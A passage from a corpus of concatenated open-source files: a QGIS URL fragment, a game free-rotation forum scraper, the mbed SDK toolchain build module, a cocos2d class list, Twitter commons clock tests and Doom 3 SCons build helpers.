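    url.addQueryItem("xField", "X")       # point geometry from the X/Y columns
    url.addQueryItem("yField", "Y")
    url.addQueryItem("crs", "epsg:4326")
    return url.toString()                 # pass to QgsVectorLayer(..., 'delimitedtext')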
| gpl-2.0 |
rhots/automation | automation/rotation.py | 1 | 2732 | from bs4 import BeautifulSoup
import requests
from .hero import Hero
class Rotation:
"""Rotation is able to get the latest free hero rotation."""
FORUM_URL = "https://us.battle.net/heroes/en/forum/topic/17936383460"
# TODO: omg get this outta here
SECOND_SPRITESHEET_HEROES = ["Samuro", "Ragnaros", "Varian", "Zul'jin", "Valeera", "Lúcio"]
def __init__(self):
pass
def get_rotation(self):
html = requests.get(self.FORUM_URL).text
soup = BeautifulSoup(html, "html.parser")
post = soup.select("div.TopicPost-bodyContent")[0]
header = post.span.text
date = header.split("Rotation: ")[-1]
heroes = [self._remove_slot_text(li.text) for li in post.find_all("li")]
heroes = [Hero(name) for name in heroes]
return date, heroes
# TODO: omg get this outta here
def sidebar_text(self):
"""We want the sidebar text to be formatted like the following:
* spacer
* 3 heroes
* spacer
* 4 heroes
* spacer
* 3 heroes
* spacer
* bottom
"""
_, heroes = self.get_rotation()
formatted_heroes = [self._format_hero(h) for h in heroes]
spacer = "[](#spacer)"
bottom = "[](#bottom)"
# This could be more concise using inserts, but this seems to
# be the clearest method for future readers.
final_line_items = [spacer]
final_line_items += formatted_heroes[:3]
final_line_items += [spacer]
final_line_items += formatted_heroes[3:7]
final_line_items += [spacer]
final_line_items += formatted_heroes[7:10]
final_line_items += [spacer]
final_line_items += [bottom]
return "\n".join(final_line_items)
def _format_hero(self, hero):
"""_format_hero formats a hero's name into a line item in
the sidebar's free rotation."""
bnet_slug = hero.battle_net_slug()
css_id = hero.css_id()
# Reddit's stylesheet images have a limited size, so we have
# more than one spritesheet providing the rotation icons.
sheet_suffix = "2" if self._needs_second_sheet(hero) else ""
format_str = "[](http://us.battle.net/heroes/en/heroes/{0}/#free_rotation{1}#{2})"
return format_str.format(
bnet_slug,
sheet_suffix,
css_id)
def _remove_slot_text(self, s):
if "Slot unlocked at" not in s:
return s
return s.split(" (Slot unlocked at")[0]
# TODO: omg get this outta here
def _needs_second_sheet(self, hero):
return hero.name in self.SECOND_SPRITESHEET_HEROES
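# Illustrative shape of sidebar_text() output (hypothetical hero slug), matching
# the spacer/3/4/3/bottom layout described in the docstring above:
#
#   [](#spacer)
#   [](http://us.battle.net/heroes/en/heroes/li-li/#free_rotation#li-li)
#   ... two more heroes ...
#   [](#spacer)
#   ... four heroes ...
#   [](#spacer)
#   ... three heroes ...
#   [](#spacer)
#   [](#bottom)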
| isc |
GustavWi/mbed | workspace_tools/toolchains/__init__.py | 18 | 25949 | """
mbed SDK
Copyright (c) 2011-2013 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import re
import sys
from os import stat, walk
from copy import copy
from time import time, sleep
from types import ListType
from shutil import copyfile
from os.path import join, splitext, exists, relpath, dirname, basename, split
from inspect import getmro
from multiprocessing import Pool, cpu_count
from workspace_tools.utils import run_cmd, mkdir, rel_path, ToolException, split_path
from workspace_tools.settings import BUILD_OPTIONS, MBED_ORG_USER
import workspace_tools.hooks as hooks
# Disables multiprocessing if set to a number higher than the host machine's CPU count
CPU_COUNT_MIN = 1
def print_notify(event, silent=False):
""" Default command line notification
"""
if event['type'] in ['info', 'debug']:
print event['message']
elif event['type'] == 'cc':
event['severity'] = event['severity'].title()
event['file'] = basename(event['file'])
print '[%(severity)s] %(file)s@%(line)s: %(message)s' % event
elif event['type'] == 'progress':
if not silent:
print '%s: %s' % (event['action'].title(), basename(event['file']))
def print_notify_verbose(event, silent=False):
""" Default command line notification with more verbose mode
"""
if event['type'] in ['info', 'debug']:
print_notify(event) # standard handle
elif event['type'] == 'cc':
event['severity'] = event['severity'].title()
event['file'] = basename(event['file'])
event['mcu_name'] = "None"
event['toolchain'] = "None"
event['target_name'] = event['target_name'].upper() if event['target_name'] else "Unknown"
event['toolchain_name'] = event['toolchain_name'].upper() if event['toolchain_name'] else "Unknown"
print '[%(severity)s] %(target_name)s::%(toolchain_name)s::%(file)s@%(line)s: %(message)s' % event
elif event['type'] == 'progress':
print_notify(event) # standard handle
def compile_worker(job):
results = []
for command in job['commands']:
_, _stderr, _rc = run_cmd(command, job['work_dir'])
results.append({
'code': _rc,
'output': _stderr,
'command': command
})
return {
'source': job['source'],
'object': job['object'],
'commands': job['commands'],
'results': results
}
class Resources:
def __init__(self, base_path=None):
self.base_path = base_path
self.inc_dirs = []
self.headers = []
self.s_sources = []
self.c_sources = []
self.cpp_sources = []
self.lib_dirs = set([])
self.objects = []
self.libraries = []
# mbed special files
self.lib_builds = []
self.lib_refs = []
self.repo_dirs = []
self.repo_files = []
self.linker_script = None
# Other files
self.hex_files = []
self.bin_files = []
def add(self, resources):
self.inc_dirs += resources.inc_dirs
self.headers += resources.headers
self.s_sources += resources.s_sources
self.c_sources += resources.c_sources
self.cpp_sources += resources.cpp_sources
self.lib_dirs |= resources.lib_dirs
self.objects += resources.objects
self.libraries += resources.libraries
self.lib_builds += resources.lib_builds
self.lib_refs += resources.lib_refs
self.repo_dirs += resources.repo_dirs
self.repo_files += resources.repo_files
if resources.linker_script is not None:
self.linker_script = resources.linker_script
self.hex_files += resources.hex_files
self.bin_files += resources.bin_files
def relative_to(self, base, dot=False):
for field in ['inc_dirs', 'headers', 's_sources', 'c_sources',
'cpp_sources', 'lib_dirs', 'objects', 'libraries',
'lib_builds', 'lib_refs', 'repo_dirs', 'repo_files', 'hex_files', 'bin_files']:
v = [rel_path(f, base, dot) for f in getattr(self, field)]
setattr(self, field, v)
if self.linker_script is not None:
self.linker_script = rel_path(self.linker_script, base, dot)
def win_to_unix(self):
for field in ['inc_dirs', 'headers', 's_sources', 'c_sources',
'cpp_sources', 'lib_dirs', 'objects', 'libraries',
'lib_builds', 'lib_refs', 'repo_dirs', 'repo_files', 'hex_files', 'bin_files']:
v = [f.replace('\\', '/') for f in getattr(self, field)]
setattr(self, field, v)
if self.linker_script is not None:
self.linker_script = self.linker_script.replace('\\', '/')
def __str__(self):
s = []
for (label, resources) in (
('Include Directories', self.inc_dirs),
('Headers', self.headers),
('Assembly sources', self.s_sources),
('C sources', self.c_sources),
('C++ sources', self.cpp_sources),
('Library directories', self.lib_dirs),
('Objects', self.objects),
('Libraries', self.libraries),
('Hex files', self.hex_files),
('Bin files', self.bin_files),
):
if resources:
s.append('%s:\n ' % label + '\n '.join(resources))
if self.linker_script:
s.append('Linker Script: ' + self.linker_script)
return '\n'.join(s)
# Support legacy build conventions: the original mbed build system did not have
# standard labels for the "TARGET_" and "TOOLCHAIN_" specific directories, but
# instead relied on a hard-coded list of directory names to ignore.
LEGACY_IGNORE_DIRS = set([
'LPC11U24', 'LPC1768', 'LPC2368', 'LPC4088', 'LPC812', 'KL25Z',
'ARM', 'GCC_ARM', 'GCC_CR', 'GCC_CS', 'IAR', 'uARM'
])
LEGACY_TOOLCHAIN_NAMES = {
'ARM_STD':'ARM', 'ARM_MICRO': 'uARM',
'GCC_ARM': 'GCC_ARM', 'GCC_CR': 'GCC_CR', 'GCC_CS': 'GCC_CS',
'IAR': 'IAR',
}
class mbedToolchain:
VERBOSE = True
CORTEX_SYMBOLS = {
"Cortex-M0" : ["__CORTEX_M0", "ARM_MATH_CM0"],
"Cortex-M0+": ["__CORTEX_M0PLUS", "ARM_MATH_CM0PLUS"],
"Cortex-M1" : ["__CORTEX_M3", "ARM_MATH_CM1"],
"Cortex-M3" : ["__CORTEX_M3", "ARM_MATH_CM3"],
"Cortex-M4" : ["__CORTEX_M4", "ARM_MATH_CM4"],
"Cortex-M4F" : ["__CORTEX_M4", "ARM_MATH_CM4", "__FPU_PRESENT=1"],
"Cortex-M7" : ["__CORTEX_M7", "ARM_MATH_CM7"],
"Cortex-M7F" : ["__CORTEX_M7", "ARM_MATH_CM7", "__FPU_PRESENT=1"],
"Cortex-A9" : ["__CORTEX_A9", "ARM_MATH_CA9", "__FPU_PRESENT", "__CMSIS_RTOS", "__EVAL", "__MBED_CMSIS_RTOS_CA9"],
}
GOANNA_FORMAT = "[Goanna] warning [%FILENAME%:%LINENO%] - [%CHECKNAME%(%SEVERITY%)] %MESSAGE%"
GOANNA_DIAGNOSTIC_PATTERN = re.compile(r'"\[Goanna\] (?P<severity>warning) \[(?P<file>[^:]+):(?P<line>\d+)\] \- (?P<message>.*)"')
def __init__(self, target, options=None, notify=None, macros=None, silent=False):
self.target = target
self.name = self.__class__.__name__
self.hook = hooks.Hook(target, self)
self.silent = silent
self.legacy_ignore_dirs = LEGACY_IGNORE_DIRS - set([target.name, LEGACY_TOOLCHAIN_NAMES[self.name]])
self.notify_fun = notify if notify is not None else print_notify
self.options = options if options is not None else []
self.macros = macros or []
self.options.extend(BUILD_OPTIONS)
if self.options:
self.info("Build Options: %s" % (', '.join(self.options)))
self.obj_path = join("TARGET_"+target.name, "TOOLCHAIN_"+self.name)
self.symbols = None
self.labels = None
self.has_config = False
self.build_all = False
self.timestamp = time()
self.jobs = 1
self.CHROOT = None
self.mp_pool = None
def notify(self, event):
""" Little closure for notify functions
"""
return self.notify_fun(event, self.silent)
def __exit__(self):
if self.mp_pool is not None:
self.mp_pool.terminate()
def goanna_parse_line(self, line):
if "analyze" in self.options:
return self.GOANNA_DIAGNOSTIC_PATTERN.match(line)
else:
return None
def get_symbols(self):
if self.symbols is None:
# Target and Toolchain symbols
labels = self.get_labels()
self.symbols = ["TARGET_%s" % t for t in labels['TARGET']]
self.symbols.extend(["TOOLCHAIN_%s" % t for t in labels['TOOLCHAIN']])
# Config support
if self.has_config:
self.symbols.append('HAVE_MBED_CONFIG_H')
# Cortex CPU symbols
if self.target.core in mbedToolchain.CORTEX_SYMBOLS:
self.symbols.extend(mbedToolchain.CORTEX_SYMBOLS[self.target.core])
# Symbols defined by the online build system
self.symbols.extend(['MBED_BUILD_TIMESTAMP=%s' % self.timestamp, '__MBED__=1'])
if MBED_ORG_USER:
self.symbols.append('MBED_USERNAME=' + MBED_ORG_USER)
# Add target's symbols
self.symbols += self.target.macros
# Add extra symbols passed via 'macros' parameter
self.symbols += self.macros
# Form factor variables
if hasattr(self.target, 'supported_form_factors'):
self.symbols.extend(["TARGET_FF_%s" % t for t in self.target.supported_form_factors])
return self.symbols
def get_labels(self):
if self.labels is None:
toolchain_labels = [c.__name__ for c in getmro(self.__class__)]
toolchain_labels.remove('mbedToolchain')
self.labels = {
'TARGET': self.target.get_labels(),
'TOOLCHAIN': toolchain_labels
}
return self.labels
def need_update(self, target, dependencies):
if self.build_all:
return True
if not exists(target):
return True
target_mod_time = stat(target).st_mtime
for d in dependencies:
# Some objects are not provided with a full path, and we do not have
# information about the library paths here. Safe option: assume an update is needed.
if not d or not exists(d):
return True
if stat(d).st_mtime >= target_mod_time:
return True
return False
def scan_resources(self, path):
labels = self.get_labels()
resources = Resources(path)
self.has_config = False
""" os.walk(top[, topdown=True[, onerror=None[, followlinks=False]]])
When topdown is True, the caller can modify the dirnames list in-place
(perhaps using del or slice assignment), and walk() will only recurse into
the subdirectories whose names remain in dirnames; this can be used to prune
the search, impose a specific order of visiting, or even to inform walk()
about directories the caller creates or renames before it resumes walk()
again. Modifying dirnames when topdown is False is ineffective, because in
bottom-up mode the directories in dirnames are generated before dirpath
itself is generated.
"""
for root, dirs, files in walk(path):
# Remove ignored directories
for d in copy(dirs):
if d == '.hg':
dir_path = join(root, d)
resources.repo_dirs.append(dir_path)
resources.repo_files.extend(self.scan_repository(dir_path))
if ((d.startswith('.') or d in self.legacy_ignore_dirs) or
(d.startswith('TARGET_') and d[7:] not in labels['TARGET']) or
(d.startswith('TOOLCHAIN_') and d[10:] not in labels['TOOLCHAIN'])):
dirs.remove(d)
# Add root to include paths
resources.inc_dirs.append(root)
for file in files:
file_path = join(root, file)
_, ext = splitext(file)
ext = ext.lower()
if ext == '.s':
resources.s_sources.append(file_path)
elif ext == '.c':
resources.c_sources.append(file_path)
elif ext == '.cpp':
resources.cpp_sources.append(file_path)
elif ext == '.h' or ext == '.hpp':
if basename(file_path) == "mbed_config.h":
self.has_config = True
resources.headers.append(file_path)
elif ext == '.o':
resources.objects.append(file_path)
elif ext == self.LIBRARY_EXT:
resources.libraries.append(file_path)
resources.lib_dirs.add(root)
elif ext == self.LINKER_EXT:
if resources.linker_script is not None:
self.info("Warning: Multiple linker scripts detected: %s -> %s" % (resources.linker_script, file_path))
resources.linker_script = file_path
elif ext == '.lib':
resources.lib_refs.append(file_path)
elif ext == '.bld':
resources.lib_builds.append(file_path)
elif file == '.hgignore':
resources.repo_files.append(file_path)
elif ext == '.hex':
resources.hex_files.append(file_path)
elif ext == '.bin':
resources.bin_files.append(file_path)
return resources
def scan_repository(self, path):
resources = []
for root, dirs, files in walk(path):
# Remove ignored directories
for d in copy(dirs):
if d == '.' or d == '..':
dirs.remove(d)
for file in files:
file_path = join(root, file)
resources.append(file_path)
return resources
def copy_files(self, files_paths, trg_path, rel_path=None):
# Handle a single file
if type(files_paths) != ListType: files_paths = [files_paths]
for source in files_paths:
if source is None:
files_paths.remove(source)
for source in files_paths:
if rel_path is not None:
relative_path = relpath(source, rel_path)
else:
_, relative_path = split(source)
target = join(trg_path, relative_path)
if (target != source) and (self.need_update(target, [source])):
self.progress("copy", relative_path)
mkdir(dirname(target))
copyfile(source, target)
def relative_object_path(self, build_path, base_dir, source):
source_dir, name, _ = split_path(source)
obj_dir = join(build_path, relpath(source_dir, base_dir))
mkdir(obj_dir)
return join(obj_dir, name + '.o')
def compile_sources(self, resources, build_path, inc_dirs=None):
# Web IDE progress bar for project build
files_to_compile = resources.s_sources + resources.c_sources + resources.cpp_sources
self.to_be_compiled = len(files_to_compile)
self.compiled = 0
#for i in self.build_params:
# self.debug(i)
# self.debug("%s" % self.build_params[i])
inc_paths = resources.inc_dirs
if inc_dirs is not None:
inc_paths.extend(inc_dirs)
objects = []
queue = []
prev_dir = None
# The dependency checking for C/C++ is delegated to the compiler
base_path = resources.base_path
files_to_compile.sort()
for source in files_to_compile:
_, name, _ = split_path(source)
object = self.relative_object_path(build_path, base_path, source)
# Avoid multiple mkdir() calls on same work directory
work_dir = dirname(object)
if work_dir is not prev_dir:
prev_dir = work_dir
mkdir(work_dir)
# Queue mode (multiprocessing)
commands = self.compile_command(source, object, inc_paths)
if commands is not None:
queue.append({
'source': source,
'object': object,
'commands': commands,
'work_dir': work_dir,
'chroot': self.CHROOT
})
else:
objects.append(object)
# Use queues/multiprocessing if cpu count is higher than setting
jobs = self.jobs if self.jobs else cpu_count()
if jobs > CPU_COUNT_MIN and len(queue) > jobs:
return self.compile_queue(queue, objects)
else:
return self.compile_seq(queue, objects)
def compile_seq(self, queue, objects):
for item in queue:
result = compile_worker(item)
self.compiled += 1
self.progress("compile", item['source'], build_update=True)
for res in result['results']:
self.debug("Command: %s" % ' '.join(res['command']))
self.compile_output([
res['code'],
res['output'],
res['command']
])
objects.append(result['object'])
return objects
def compile_queue(self, queue, objects):
jobs_count = int(self.jobs if self.jobs else cpu_count())
p = Pool(processes=jobs_count)
results = []
for i in range(len(queue)):
results.append(p.apply_async(compile_worker, [queue[i]]))
itr = 0
while True:
itr += 1
if itr > 30000:
p.terminate()
p.join()
raise ToolException("Compile did not finish in 5 minutes")
pending = 0
for r in results:
if r._ready is True:
try:
result = r.get()
results.remove(r)
self.compiled += 1
self.progress("compile", result['source'], build_update=True)
for res in result['results']:
self.debug("Command: %s" % ' '.join(res['command']))
self.compile_output([
res['code'],
res['output'],
res['command']
])
objects.append(result['object'])
except ToolException, err:
p.terminate()
p.join()
raise ToolException(err)
else:
pending += 1
if pending > jobs_count:
break
if len(results) == 0:
break
sleep(0.01)
results = None
p.terminate()
p.join()
return objects
def compile_command(self, source, object, includes):
# Check dependencies
_, ext = splitext(source)
ext = ext.lower()
if ext == '.c' or ext == '.cpp':
base, _ = splitext(object)
dep_path = base + '.d'
deps = self.parse_dependencies(dep_path) if (exists(dep_path)) else []
if len(deps) == 0 or self.need_update(object, deps):
if ext == '.c':
return self.compile_c(source, object, includes)
else:
return self.compile_cpp(source, object, includes)
elif ext == '.s':
deps = [source]
if self.need_update(object, deps):
return self.assemble(source, object, includes)
else:
return False
return None
def compile_output(self, output=[]):
_rc = output[0]
_stderr = output[1]
command = output[2]
# Parse output for Warnings and Errors
self.parse_output(_stderr)
self.debug("Return: %s"% _rc)
for error_line in _stderr.splitlines():
self.debug("Output: %s"% error_line)
# Check return code
if _rc != 0:
for line in _stderr.splitlines():
self.tool_error(line)
raise ToolException(_stderr)
def compile(self, cc, source, object, includes):
_, ext = splitext(source)
ext = ext.lower()
command = cc + ['-D%s' % s for s in self.get_symbols()] + ["-I%s" % i for i in includes] + ["-o", object, source]
if hasattr(self, "get_dep_opt"):
base, _ = splitext(object)
dep_path = base + '.d'
command.extend(self.get_dep_opt(dep_path))
if hasattr(self, "cc_extra"):
command.extend(self.cc_extra(base))
return [command]
def compile_c(self, source, object, includes):
return self.compile(self.cc, source, object, includes)
def compile_cpp(self, source, object, includes):
return self.compile(self.cppc, source, object, includes)
def build_library(self, objects, dir, name):
lib = self.STD_LIB_NAME % name
fout = join(dir, lib)
if self.need_update(fout, objects):
self.info("Library: %s" % lib)
self.archive(objects, fout)
def link_program(self, r, tmp_path, name):
ext = 'bin'
if hasattr(self.target, 'OUTPUT_EXT'):
ext = self.target.OUTPUT_EXT
if hasattr(self.target, 'OUTPUT_NAMING'):
self.var("binary_naming", self.target.OUTPUT_NAMING)
if self.target.OUTPUT_NAMING == "8.3":
name = name[0:8]
ext = ext[0:3]
filename = name+'.'+ext
elf = join(tmp_path, name + '.elf')
bin = join(tmp_path, filename)
if self.need_update(elf, r.objects + r.libraries + [r.linker_script]):
self.progress("link", name)
self.link(elf, r.objects, r.libraries, r.lib_dirs, r.linker_script)
if self.need_update(bin, [elf]):
self.progress("elf2bin", name)
self.binary(r, elf, bin)
self.var("compile_succeded", True)
self.var("binary", filename)
return bin
def default_cmd(self, command):
_stdout, _stderr, _rc = run_cmd(command)
# Print all warnings / errors from stderr to console output
for error_line in _stderr.splitlines():
print error_line
self.debug("Command: %s"% ' '.join(command))
self.debug("Return: %s"% _rc)
for output_line in _stdout.splitlines():
self.debug("Output: %s"% output_line)
for error_line in _stderr.splitlines():
self.debug("Errors: %s"% error_line)
if _rc != 0:
for line in _stderr.splitlines():
self.tool_error(line)
raise ToolException(_stderr)
### NOTIFICATIONS ###
def info(self, message):
self.notify({'type': 'info', 'message': message})
def debug(self, message):
if self.VERBOSE:
if type(message) is ListType:
message = ' '.join(message)
message = "[DEBUG] " + message
self.notify({'type': 'debug', 'message': message})
def cc_info(self, severity, file, line, message, target_name=None, toolchain_name=None):
self.notify({'type': 'cc',
'severity': severity,
'file': file,
'line': line,
'message': message,
'target_name': target_name,
'toolchain_name': toolchain_name})
def progress(self, action, file, build_update=False):
msg = {'type': 'progress', 'action': action, 'file': file}
if build_update:
msg['percent'] = 100. * float(self.compiled) / float(self.to_be_compiled)
self.notify(msg)
def tool_error(self, message):
self.notify({'type': 'tool_error', 'message': message})
def var(self, key, value):
self.notify({'type': 'var', 'key': key, 'val': value})
from workspace_tools.settings import ARM_BIN
from workspace_tools.settings import GCC_ARM_PATH, GCC_CR_PATH, GCC_CS_PATH, CW_EWL_PATH, CW_GCC_PATH
from workspace_tools.settings import IAR_PATH
TOOLCHAIN_BIN_PATH = {
'ARM': ARM_BIN,
'uARM': ARM_BIN,
'GCC_ARM': GCC_ARM_PATH,
'GCC_CS': GCC_CS_PATH,
'GCC_CR': GCC_CR_PATH,
'GCC_CW_EWL': CW_EWL_PATH,
'GCC_CW_NEWLIB': CW_GCC_PATH,
'IAR': IAR_PATH
}
from workspace_tools.toolchains.arm import ARM_STD, ARM_MICRO
from workspace_tools.toolchains.gcc import GCC_ARM, GCC_CS, GCC_CR
from workspace_tools.toolchains.gcc import GCC_CW_EWL, GCC_CW_NEWLIB
from workspace_tools.toolchains.iar import IAR
TOOLCHAIN_CLASSES = {
'ARM': ARM_STD,
'uARM': ARM_MICRO,
'GCC_ARM': GCC_ARM,
'GCC_CS': GCC_CS,
'GCC_CR': GCC_CR,
'GCC_CW_EWL': GCC_CW_EWL,
'GCC_CW_NEWLIB': GCC_CW_NEWLIB,
'IAR': IAR
}
TOOLCHAINS = set(TOOLCHAIN_CLASSES.keys())
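# Minimal usage sketch (not part of this module; the target object and paths are
# assumptions) showing how a build script typically drives a toolchain:
#
#   toolchain = TOOLCHAIN_CLASSES['GCC_ARM'](target, options=[], macros=[])
#   SetupBufferedOutput(toolchain, silent=False)
#   SetupUtils(toolchain)
#   resources = toolchain.scan_resources('libraries/mbed')
#   objects = toolchain.compile_sources(resources, 'build/obj')
#   binary = toolchain.link_program(resources, 'build', 'my_program')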
| apache-2.0 |
DNESS/cocos2d-objc | tools/compatibility_with_0_8/classes_0_8.py | 50 | 4022 | classes = { "AccelAmplitude" : "", "AccelDeccelAmplitude" : "", "Action" : "", "ActionManager" : "", "Animate" : "", "Animation" : "", "AtlasAnimation" : "", "AtlasNode" : "", "AtlasSprite" : "", "AtlasSpriteFrame" : "", "AtlasSpriteManager" : "", "BezierBy" : "", "BezierTo" : "", "BitmapFontAtlas" : "", "BitmapFontConfiguration" : "", "Blink" : "", "CallFunc" : "", "CallFuncN" : "", "CallFuncND" : "", "Camera" : "", "CameraAction" : "", "CocosNode" : "", "ColorLayer" : "", "DeccelAmplitude" : "", "DelayTime" : "", "Director" : "", "DisplayLinkDirector" : "", "EAGLView" : "", "EaseAction" : "", "EaseBackIn" : "", "EaseBackInOut" : "", "EaseBackOut" : "", "EaseBounce" : "", "EaseBounceIn" : "", "EaseBounceInOut" : "", "EaseBounceOut" : "", "EaseElastic" : "", "EaseElasticIn" : "", "EaseElasticInOut" : "", "EaseElasticOut" : "", "EaseExponentialIn" : "", "EaseExponentialInOut" : "", "EaseExponentialOut" : "", "EaseIn" : "", "EaseInOut" : "", "EaseOut" : "", "EaseRateAction" : "", "EaseSineIn" : "", "EaseSineInOut" : "", "EaseSineOut" : "", "FadeBLTransition" : "", "FadeDownTransition" : "", "FadeIn" : "", "FadeOut" : "", "FadeOutBLTiles" : "", "FadeOutDownTiles" : "", "FadeOutTRTiles" : "", "FadeOutUpTiles" : "", "FadeTRTransition" : "", "FadeTo" : "", "FadeTransition" : "", "FadeUpTransition" : "", "FastDirector" : "", "FileUtils" : "", "FiniteTimeAction" : "", "FlipAngularTransition" : "", "FlipX3D" : "", "FlipXTransition" : "", "FlipY3D" : "", "FlipYTransition" : "", "Grabber" : "", "Grid3D" : "", "Grid3DAction" : "", "GridAction" : "", "GridBase" : "", "Hide" : "", "InstantAction" : "", "IntervalAction" : "", "JumpBy" : "", "JumpTiles3D" : "", "JumpTo" : "", "JumpZoomTransition" : "", "Label" : "", "LabelAtlas" : "", "Layer" : "", "Lens3D" : "", "Liquid" : "", "Menu" : "", "MenuItem" : "", "MenuItemAtlasFont" : "", "MenuItemAtlasSprite" : "", "MenuItemFont" : "", "MenuItemImage" : "", "MenuItemLabel" : "", "MenuItemSprite" : "", "MenuItemToggle" : "", "MotionStreak" : "", "MoveBy" : "", "MoveInBTransition" : "", "MoveInLTransition" : "", "MoveInRTransition" : "", "MoveInTTransition" : "", "MoveTo" : "", "MultiplexLayer" : "", "OrbitCamera" : "", "OrientedTransitionScene" : "", "PVRTexture" : "", "PageTurn3D" : "", "PageTurnTransition" : "", "ParallaxNode" : "", "ParticleExplosion" : "", "ParticleFire" : "", "ParticleFireworks" : "", "ParticleFlower" : "", "ParticleGalaxy" : "", "ParticleMeteor" : "", "ParticleRain" : "", "ParticleSmoke" : "", "ParticleSnow" : "", "ParticleSpiral" : "", "ParticleSun" : "", "ParticleSystem" : "", "Place" : "", "PointParticleSystem" : "", "QuadParticleSystem" : "", "RenderTexture" : "", "Repeat" : "", "RepeatForever" : "", "ReuseGrid" : "", "ReverseTime" : "", "Ribbon" : "", "RibbonSegment" : "", "Ripple3D" : "", "RotateBy" : "", "RotateTo" : "", "RotoZoomTransition" : "", "ScaleBy" : "", "ScaleTo" : "", "Scene" : "", "Scheduler" : "", "Sequence" : "", "Shaky3D" : "", "ShakyTiles3D" : "", "ShatteredTiles3D" : "", "Show" : "", "ShrinkGrowTransition" : "", "ShuffleTiles" : "", "SlideInBTransition" : "", "SlideInLTransition" : "", "SlideInRTransition" : "", "SlideInTTransition" : "", "Spawn" : "", "Speed" : "", "SplitCols" : "", "SplitColsTransition" : "", "SplitRows" : "", "SplitRowsTransition" : "", "Sprite" : "", "StandardTouchHandler" : "", "StopGrid" : "", "TMXLayer" : "", "TMXLayerInfo" : "", "TMXMapInfo" : "", "TMXTiledMap" : "", "TMXTilesetInfo" : "", "TargetedTouchHandler" 
: "", "Texture2D" : "", "TextureAtlas" : "", "TextureMgr" : "", "TextureNode" : "", "ThreadedFastDirector" : "", "TileMapAtlas" : "", "TiledGrid3D" : "", "TiledGrid3DAction" : "", "Timer" : "", "TimerDirector" : "", "TintBy" : "", "TintTo" : "", "ToggleVisibility" : "", "TouchDispatcher" : "", "TouchHandler" : "", "TransitionScene" : "", "TurnOffTiles" : "", "TurnOffTilesTransition" : "", "Twirl" : "", "Waves" : "", "Waves3D" : "", "WavesTiles3D" : "", "ZoomFlipAngularTransition" : "", "ZoomFlipXTransition" : "", "ZoomFlipYTransition" : "",} | mit |
atollena/commons | tests/python/twitter/common/testing/test_clock.py | 13 | 2792 | # ==================================================================================================
# Copyright 2015 Twitter, Inc.
# --------------------------------------------------------------------------------------------------
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this work except in compliance with the License.
# You may obtain a copy of the License in the LICENSE file, or at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==================================================================================================
import threading
from twitter.common.testing.clock import ThreadedClock
import pytest
@pytest.mark.parametrize('num_threads', (1, 10))
def test_with_events(num_threads):
event = threading.Event()
hits = []
hits_before, hits_after = 0, 0
clock = ThreadedClock(0)
def hit_me():
clock.sleep(0.1)
hits.append(True)
threads = []
for _ in range(num_threads):
th = threading.Thread(target=hit_me)
th.daemon = True
th.start()
threads.append(th)
clock.converge(threads=threads)
for th in threads:
clock.assert_waiting(th, 0.1)
clock.tick(0.05)
clock.converge(threads=threads)
hits_before += len(hits)
with pytest.raises(AssertionError):
clock.assert_waiting(threads[0], 234)
clock.tick(0.05)
clock.converge(threads=threads)
hits_after += len(hits)
for th in threads:
clock.assert_not_waiting(th)
with pytest.raises(AssertionError):
clock.assert_waiting(th, 0.1)
assert hits_before == 0
assert hits_after == num_threads
def test_not_converged():
clock1 = ThreadedClock(0)
clock2 = ThreadedClock(0)
def run():
clock1.sleep(1)
clock2.sleep(1)
th = threading.Thread(target=run)
th.daemon = True
th.start()
assert clock1.converge(threads=[th])
clock1.assert_waiting(th, 1)
assert clock2.converge(threads=[th], timeout=0.1) is False
clock2.assert_not_waiting(th)
clock1.tick(1)
clock2.tick(2)
clock1.converge(threads=[th])
clock2.converge(threads=[th])
clock1.assert_not_waiting(th)
clock2.assert_not_waiting(th)
def test_sleep_0():
clock = ThreadedClock(0)
event = threading.Event()
def run():
clock.sleep(0)
event.set()
th = threading.Thread(target=run)
th.daemon = True
th.start()
assert clock.converge(threads=[th])
assert event.is_set()
def test_sleep_negative():
with pytest.raises(IOError):
ThreadedClock(0).sleep(-1)
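# Usage sketch of the ThreadedClock pattern exercised above (assumption: the clock
# exposes sleep/tick/converge/assert_* exactly as used in these tests):
#
#   clock = ThreadedClock(0)
#   worker = threading.Thread(target=lambda: clock.sleep(5))
#   worker.daemon = True
#   worker.start()
#   clock.converge(threads=[worker])   # wait until the worker blocks in sleep()
#   clock.assert_waiting(worker, 5)
#   clock.tick(5)                      # advance virtual time; sleep(5) returns
#   clock.converge(threads=[worker])
#   clock.assert_not_waiting(worker)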
| apache-2.0 |
AreaScout/dante-doom3-odroid | neo/sys/scons/scons_utils.py | 2 | 5123 | # -*- mode: python -*-
import sys, os, string, time, commands, re, pickle, StringIO, popen2, commands, pdb, zipfile, tempfile
import SCons
# system detection -------------------------------
# CPU type
cpu = commands.getoutput('uname -m')
exp = re.compile('i?86')
if exp.match(cpu):
cpu = 'x86'
else:
if (commands.getoutput('uname -p') == 'powerpc'):
cpu = 'ppc'
g_os = 'Linux'
# end system detection ---------------------------
# need an Environment and a matching buffered_spawn API .. encapsulate
class idBuffering:
silent = False
def buffered_spawn( self, sh, escape, cmd, args, env ):
stderr = StringIO.StringIO()
stdout = StringIO.StringIO()
command_string = ''
for i in args:
if ( len( command_string ) ):
command_string += ' '
command_string += i
try:
retval = self.env['PSPAWN']( sh, escape, cmd, args, env, stdout, stderr )
except OSError, x:
if x.errno != 10:
raise x
print 'OSError ignored on command: %s' % command_string
retval = 0
print command_string
if ( retval != 0 or not self.silent ):
sys.stdout.write( stdout.getvalue() )
sys.stderr.write( stderr.getvalue() )
return retval
class idSetupBase:
def SimpleCommand( self, cmd ):
print cmd
ret = commands.getstatusoutput( cmd )
if ( len( ret[ 1 ] ) ):
sys.stdout.write( ret[ 1 ] )
sys.stdout.write( '\n' )
if ( ret[ 0 ] != 0 ):
raise 'command failed'
